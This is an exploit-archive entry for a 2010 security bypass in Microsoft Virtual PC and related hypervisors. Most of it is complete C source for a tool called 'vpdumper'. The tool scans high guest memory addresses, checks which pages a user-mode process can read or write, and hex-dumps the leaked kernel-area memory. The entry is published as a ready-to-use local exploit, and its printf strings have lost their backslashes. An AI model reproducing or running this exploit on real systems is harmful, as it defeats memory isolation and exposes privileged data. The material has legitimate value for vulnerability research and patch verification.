Microsoft Virtual PC Hypervisor Virtual Machine Bypass Vulnerability

2010-03-17T00:00:00
ID 1337DAY-ID-11340
Type zdt
Reporter Nicolas Economou
Modified 2010-03-17T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            =====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================

Vulnerable:  	 Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0


#include <windows.h>
#include <stdio.h>
#include <ctype.h>
     
#define ROWS 16

void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );

int main ( void )
{
   /* message for users */
    printf ( "n*********** vpdumper.exe ***********" );
    printf ( "nCreated by Nicolas A. Economou ( [email protected] )" );
    printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" );

    /* Search and Print leaked memory */
    printf ( "nsearching leaked memoryn" );
    find_leaked_memory ();

    return ( 1 );
}

void find_leaked_memory ( void )
{
        char buffer [ 0x1000 ];
        char *base;
        int r, w;

        /* search the high address memory area */
        for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
        {
          /* Dark Area */
          if ( ( unsigned int ) base == 0xe839c000 )
          {
            continue;
          }

          /* Inicialize flags */
          r = FALSE;
          w = FALSE;

          /* check readable */
          if ( IsBadReadPtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            r = TRUE;
          }
          /* check writeable */
          if ( IsBadWritePtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            w = TRUE;
          }
          /* if readable or writeable */
          if ( r == TRUE || w == TRUE )
          {
            /* get contents into our buffer */
            memcpy ( buffer , base , 0x1000 );

            /* print page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );
            printf ( "%s" , ( w == TRUE ) ? "W":"" );
            printf ( "n" );

            /* print the memory */
            print_data ( ( unsigned int ) base , buffer , 0x1000 );
          }
        }
}

void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
  unsigned int cont;
  unsigned int i;

/* Imprimo las lineas encontradas */
  for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
  {
  /* Imprimo la direccion de la memoria */
    printf ( "%.8x | " , direccion );

  /* Incremento la direccion a mostrar */
    direccion = direccion + ROWS;
    
  /* Imprimo en hexa */
    for ( i = 0 ; i < ROWS ; i ++ )
    {
    /* Imprimo la cantidad que pedi */  
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
      }
      else
      {
        printf ( "   " );
      }
    }
  /* Espacio entre las 2 columnas */
    printf ( "| " );
  /* Imprimo en caracteres */  
    for ( i = 0 ; i < ROWS ; i ++ )
    {
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
      }
      else
      {
        printf ( " " );
      }
    }
  /* Fin de linea */
    printf ( "n" );
  }
}




#  0day.today [2018-01-08]  #